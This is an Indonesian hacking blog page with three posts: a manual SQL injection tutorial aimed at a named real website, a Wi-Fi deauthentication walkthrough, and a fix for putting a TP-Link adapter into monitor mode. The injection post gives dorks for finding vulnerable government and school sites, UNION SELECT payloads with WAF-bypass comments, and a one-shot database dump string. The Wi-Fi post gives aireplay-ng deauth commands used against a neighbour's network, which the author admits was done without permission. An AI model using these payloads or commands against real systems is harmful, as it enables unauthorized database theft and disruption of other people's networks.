Rabu, 08 Juli 2020
Tutorial SQL Injection Manual Mudah
Halo guys, sekarang gua mau share tentang SQL manual. Bagi yang ga tau SQL Injection itu apa, SQL Injection adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data (database) sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter karakter pelolos yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa yang lain. Ok langsung aja ke teknik nya
1. Dorking dulu
Nah bagi yang ga tau dork itu apa, google dork adalah fitur pencarian yang disediakan oleh google untuk mencari artikel yang berkaitan dengan query yang kita masukkan, nah dork yang umum adalah misalnya:
inurl: site.sch.id .php?id=
inurl: site.go.id php?id=
inurl: product.php?id=
Bagi yang ga tau cara dorking gimana :
Kalo udah tentuin dulu targetnya
Nah disini target gua seperti kemaren juga
https://mashailalqasr.com/eng/products.php?catid=1
Untuk mengecek nya, masukkan string ( ' ) dibelakangnya, Like this
https://mashailalqasr.com/eng/products.php?catid=1'
2. Order By
Terus kita cari jumlah kolomnya ada berapa dengan menambahkan order by dibelakangnya:
https://mashailalqasr.com/eng/products.php?catid=1' order by 1--+-
saat dilihat error, coba kita hapus ( ' ) dibelakang angka 1
https://mashailalqasr.com/eng/products.php?catid=1 order by 1--+-
Dan hasilnya mulus, kita cari jumlah kolom nya lagi sampe nemu error, caranya;
https://mashailalqasr.com/eng/products.php?catid=1 order by 1--+- ~ Mulus
https://mashailalqasr.com/eng/products.php?catid=1 order by 2--+- ~ Mulus
https://mashailalqasr.com/eng/products.php?catid=1 order by 3--+- ~ Mulus
(Gua skip aja)
https://mashailalqasr.com/eng/products.php?catid=1 order by 36--+- ~ Mulus
https://mashailalqasr.com/eng/products.php?catid=1 order by 37--+- ~ Nah ini Burik ini (error)
NB: kalo error di angka 40 dan angka 39 mulus, berarti jumlah kolom hanya sampai 39, kalo mau sekalian cek bisa di inject kolomnya atau ngga, langsung masukin aja order by 100 :v
Kolom 36 masih mulus, kita cek kolom 37
Nah ini burik namanya, langsung hantam aja!
3. Union Select
Caranya, tadi kan jumlah kolom hanya sampai 36, berarti kita masukin:
https://mashailalqasr.com/eng/products.php?catid=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+-
Kalo udah, nanti bakal ada error not acceptable blablabla by mod_security, nah itu adalah WAF nya, hal itu biasa terjadi pas lagi mau inject target :v cara menembusnya pakai command ini:
Pengganti union select: /*!12345union*/+/*!12345select*/+
Jadinya kita masukin seperti Ini:
https://mashailalqasr.com/eng/products.php?catid=1/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+-
Result:
Nah, jangan lupa scroll ke bawah untuk liat angka togelnya, disitu angka togelnya adalah 5
Jadi yang kita pakai untuk ngintip basis data/database) nya terletak di angka 5. Langsung aja kita dump dengan menggunakan DIOS (Dump In One Shot)
DIOS: /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)
Jadinya seperti ini:
https://mashailalqasr.com/eng/products.php?catid=1/*!12345union*/+/*!12345select*/+1,2,3,4, /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+-
Nanti hasilnya seperti ini:
Untuk permisalan, gua mau dump, semisal gua mau dump tables banks nya :v
Ok, Sekian dulu kalo ada yang mau ditanyain silahkan di kolom komentar
Minggu, 05 Juli 2020
Teknik Penyerangan Terhadap Wi-Fi Dan Cara Menangkalnya #1
Bro? lu tau wifi kan? iya wifi sebagai Access Point internet seseorang. Ternyata bisa dibuat down juga oleh kita, bagaimana caranya? dan bagaimana mencegahnya? simak berikut ini:
1. Apa saja keamanan Wi-Fi?
Ada tiga protokol keamanan dalam jaringan WiFi, yaitu WEP (Wired Equivalent Privacy), WPA (Wi-Fi Protected Access), dan WPA2 (Wi-Fi Protected Access versi 2). Ada tiga aspek keamanan yang dapat diharapkan dari implementasi protokol keamanan, yaitu autentisitas (, integritas, dan kerahasiaan (confidentiality). Tapi tenang saja, itu semua bisa di tembus dengan beberapa persyaratan. Dan kalo persyaratannya sudah terpenuhi, siap siap "Tidak ada Wi-Fi yang aman" jangan lupa dibuat pansos juga ya, biar dibilang "Hekel plo, ampun stah" aowkwkwk:v
2. Persyaratan Supaya Berhasil
Sebenarnya ada 5-7 persyaratan, tapi disini gua jelasin 3 persyaratan yang paling ber efek supaya teknik penyerangan Wi-Fi berhasil:
> Jarak
Ya, yang pertama adalah jarak. Bukan jarak antara kita ya aowkwkw. Jarak yang gua maksud adalah jarak si peretas dengan AP (Access Point). AP disini yang gua maksud adalah sumber internet nya atau wifi nya sendiri
> Wireless Adapter
Yang kedua adalah wireless Adapter. Disini gua pake TP-Link WN722N, usahakan cari yang range nya jauh, karena ini juga menentukan peluang berhasil atau ngga!. Kenapa saya milih TP-Link? karena cari yang model alpha / Atheros disini susah, kaya nyari cewek yang cuma chatan sama satu cowok :v
Ini TP-Link yang gua pake:
Bagi kalian yang TP-Link nya error, bisa baca disini
> Prosesor minimal 3 / lebih
Yang terakhir adalah prosesor dengan jumlah minimal 3, prosesor ini bisa disetting di virtual box dengan settings -> processor -> Pilih minimal 3 / lebih. Kita akan membutuhkan banyak tab terminal baru untuk melakukan serangan. ok langsung ke caranya
3. Melakukan serangan
A. Setting wireless adapter ke mode monitor
Yang pertama harus kalian lakukan adalah memastikan Wireless Adapter dalam keadaan monitor, kalo tidak dalam keadaan monitor, ya ga bakal bisa nargetin lah :v
root@localhost:~# iwconfig wlan0 mode monitor
Karena interface gua adalah wlan0 makanya iwconfig wlan0, untuk mengecek nya ketik:
root@localhost:~# iwconfig
Setelah itu waktunya kita monitor, tapi sebelumnya jalankan airmon-ng dengan perintah:
B. Airmon-ng
root@localhost:~# airmon-ng start <interface anda>
root@localhost:~# airmon-ng start wlan0
Interface nya sesuaikan dengan interface kalian sendiri.
C. Airodump-ng
Selanjutnya adalah airodump-ng, ya command ini untuk monitoring jaringan disekitar kita, dengan cara:
root@localhost:~# airodump-ng <interface kalian yang sudah dalam keadaan monitor>
root@localhost:~# airodump-ng wlan0
Karena wlan0 saya sebelumnya sudah dalam keadaan monitor, sebenarnya tidak terlalu penting untuk menjalankan airmon-ng :v
D. Identifikasi dan tentukan target
Nah disini gua targetin dengan ESSID dengan nama "INDIRA" dia tetangga gua :v. ESSID adalah singkatan dari Service Set Identifier, fungsinya yaitu memberikan nama untuk wireless router maupun access point anda.
E. Menentukan Station Untuk Inject Client
Nah disini kalian harus menentukan client yang mau kalian track trace root nya. Dengan perintah:
root@localhost:~# airodump-ng wlan0 --bssid FC:A6:CD:82:EF:18 --channel 1
Seperti gambar:
--bssid : bssid adalah alamat dari Access Point dengan ESSID "INDIRA"
--channel : Channel ini adalah channel dari ESSID "INDIRA" dan ingat, channel ini BUKAN yang di sebelah kiri atas, kalo salah ya ga bakal bisa, lalu kita ENTER.
Station : adalah alamat dari client (Yang terhubung dengan Access Point)
BSSID : adalah alamat dari Access Point nya, lanjut lur.
F. Aireplay-ng
Disini gua bakal pake aireplay untuk deauth client, dengan perintah;
root@localhost:~# aireplay-ng --deauth 0 -c <station atau alamat client nya> -a <bssid Acces Pointnya> <interface anda yang dalam keadaan monitor>
Atau lebih jelasnya gini:
root@localhost:~# aireplay-ng --deauth 0 -c 58:5F:F6:4D:45:E1 -a FC:A6:CD:82:EF:18 wlan0
Karena ada 2 client yang terhubung, biar makin greget kita trace juga dua duanya :v
Nah proses deauth nya udah berjalan, dan target akan marah marah dalam hati wkwkwk, bagi yang ga tau deauth itu apa
DeAuth = Dead Authentication yang berarti memaksa client untuk memutus jaringan terhadap Access Point tanpa persetujuan dari client dan ini cukup greget :v
FYI: 10:05:44 Sending 64 directed DeAuth (code 7). STMAC: [58:5F:F6:4D:45:E1] [ 0| 2 ACKs]
Dibelakang kan ada [ 0| 2 ACKs] kalo angka depannya udah berubah jadi 0 itu berarti target sudah tidak ada sinyal sama sekali, saya jamin itu semua.
Untuk mengecek benar atau tidaknya coba jalankan airodump-ng sambil menjalankan aireplay-ng, seperti gambar:
Dan bisa dilihat di angka 0 yang saya block, power = 0 xixixi, pastikan kalian sudah dapet izin untuk melakukan pentest jaringannya, jangan kaya gua om, illegal wkwkwk. Jangan ditiru :v karena gua pentest tanpa sepengetahuan si pemilik, dan satu lagi jangan lupa dibuat pansos, karena dengan pansos mastah akan mengenalmu :v
4. Melakukan pengamanan
Ini berdasarkan pengalaman Wi-Fi sodara gua di jakarta yang pernah gua test sebagai percobaan dan sudah diberi izin oleh sodara gua, berikut caranya menghindari agar Wi-FI tidak mudah di retas:
1. Gunakan password yang susah
Hal ini adalah wajib hukumnya, agar peretas tidak bisa meretas capture data yang telah didapatkan di tangan hacker, gunakan kombinasi simbol, huruf besar, huruf kecil, angka dsb. seperti: &O!(^#**!^1137#&()!&r^#* ~ ini permisalan doang ya !
2. Aktifkan Network Encryption
Kalo gua cukup tidak terlalu pengaruh dengan enkripsi saat melakukan pentest. Tapi bagi yang pemula pasti kesulitan karena dulu saya juga seperti anda :v. Maksudnya Network Encryption itu apaan bos? seperti contoh WPA2 / WPA adalah network encryption dan dikombinasikan dengan password yang sulit
3. Buat lah pendek jangkauan WI-Fi anda
Semakin pendek jangkauan Wi-Fi anda, semakin lama peretas akan meretas Wi-Fi anda, untuk mengrim frames dan Beacons diperlukan jarak yang dekat. Disetiap ada kelebihan pasti ada kekurangan :)
sekian dari gua DemonX, jika ada yang mau ditanyakan silahkan hubungi gua
Kalo ada saran konten silahkan tulis di kolom komentar :v
Rabu, 01 Juli 2020
Kenapa TP-Link WN722N error saat Monitor mode? Berikut mengatasinya
Halo guys, back again bersama aing DemonX. Sekarang gua mau share ke kalian cara mengatasi Wireless USB Adapter TL-WN722N tidak bisa melakukan monitoring mode. Trouble nya seperti apa? Simak Lebih Lanjut.
1. Permasalahan
A. Tidak bisa monitor mode
Masalah yang pertama adalah tidak bisa monitor mode. Kalo ga bisa monitor mode, ya tidak bisa melakukan airodump-ng :v. Maka otomatis tidak bisa menjalankan tools yang lainnya, misal wifite, airgeddon, fluxion dll. kalo ga bisa monitor mode auto useless :v
B. Tidak bisa airodump-ng
Yang ke 2 adalah tidak bisa melakukan airodump-ng, kalo sudah begini apa yang mau dilakuin? hahaha :v
C. Tidak bisa melakukan aireplay-ng
Aireplay-ng berfungsi untuk melakukan deauth (Memutus sambungan Client ke Access Point), kalo kita mau melakukan handshake snooper, maka harus memutus client (yang terhubung) dengan Acces Point (AP) atau hotspot nya (Sumber wifi), begitu juga dengan wifiphisher
D. Phy Null saat melakukan monitoring
Ini lah core of the core dari permasalahan itu semua wkwkwk, yang harusnya phy berubah jadi phy0 atau phy1 tapi malah null (kosong)
2. pemecahan Masalah
FYI: Pastikan kalian masuk sebagai user root dengan perintah:
kali@kali:~$ sudo su
(lalu masukkan password kalian sendiri)
(nanti akan berubah menjadi)
root@namakalian:~#
1. Pastikan kernel linux anda versi 5.6.0 (yang terbaru)
yang pertama kernel kalian harus versi terbaru cara mengeceknya:
root@localhost:~# uname -r
karena kalo pakai kernel 5.5.0 bisa saja tidak work, kalo mau mendapatkan versi 5.6.0 upgrade dan update kali kalian dengan cara perintah:
root@localhost;~# apt-get update
root@localhost:~# apt-get upgrade
Kalo kernel kalian tidak bisa di upgrade, coba untuk install ulang OS kali Linux kalian di Virtual Box
2. :~# rmmod r8188eu.ko
Nah itu error karena saya udah hapus duluan tadi hehehe, kalo belom bakal mulus ga ada error apa", kalian hapus dulu file r8188eu.ko dengan perintah di atas agar nanti bisa kita install dengan 8188eu terbaru
3. echo "blacklist r8188eu.ko" > "/etc/modprobe.d/realtek.conf"
Nah kita blacklist r8188eu.ko supaya ga bikin error saat monitor mode, ingat ya itu disimpan di dalam folder /etc/modprobe.d/ dengan file bernama realtek.conf
4. :~# git clone https://github.com/aircrack-ng/rtl8188eus
Kalian install github nya dari link diatas lalu masuk ke directory nya dengan perintah
5. :~# cd rtl8188eus
Kalo sudah, kita lanjut lagi
6. :~/rtl8188eus# make
Make ini supaya yang dibutuhkan oleh driver kita tersedia di kali linux.
Karena saya udah make duluan, jadi langsung make [1]:leaving directory
7. :~rtl8188eus# make install
Nah ini berfungsi untuk installing ke dalam system kita (Pemasangan)
Nah nanti bakal keluar tulisan
install -p -m 644 8188eu.ko /lib/modules/5.6.0-kali2-amd64/kernel/drivers/net/wireless/
/sbin/depmod -a 5.6.0-kali2-amd64
8. :~/rtl8188eus# cd
Lalu kembali ke akses root kalian dan ketik perintah ini:
9. :~# modprobe 8188eu
Untuk menjalankan dari perintah "make" yang tadi agar berjalan karena r8188eu.ko sudah diganti dengan 8188eu
10. :~# airmon-ng check kill
Untuk mengecek apakah sudah bisa digunakan untuk kill PID
11. cabut dan pasang kembali TL-WN722N
Ini dilakukan supaya me refresh drivers, lakukan jeda sekitar 10 detik.
12, :~# ip link set wlan0 down
Ini supaya mencegah PID yang sudah di kill muncul lagi
13. :~# iw dev wlan0 set type monitor
Atau bisa juga kalian ketik
:~# iwconfig wlan0 mode monitor
lalu kalian cek dengan perintah
14. :~# iwconfig
Nah nanti bakal berubah dari mode managed ke mode monitor
15. :~# airodump-ng wlan0
Nah terakhir kalian ketik perintah diatas dan hasilnya:
Ok sekian dulu tutorial error Wireless adapter TP Link nya :v
kalo ada yang mau request untuk materi selanjutnya tulis di kolom komentar ea :v
Langganan:
Komentar (Atom)
Highlited Post By DemonX
Intip Dunia IT secara Universal
Hello guys ini postingan perdana Demon untuk blogspot, sekarang demon mau basa basi dulu seputar Hacking dan dunia IT. Saat ini kedu...

-
Halo guys, sekarang gua mau share tentang Blue Thunder Tools . Tools ini untuk melacak dan memberikan informasi tentang suatu address....
-
Hello guys ini postingan perdana Demon untuk blogspot, sekarang demon mau basa basi dulu seputar Hacking dan dunia IT. Saat ini kedu...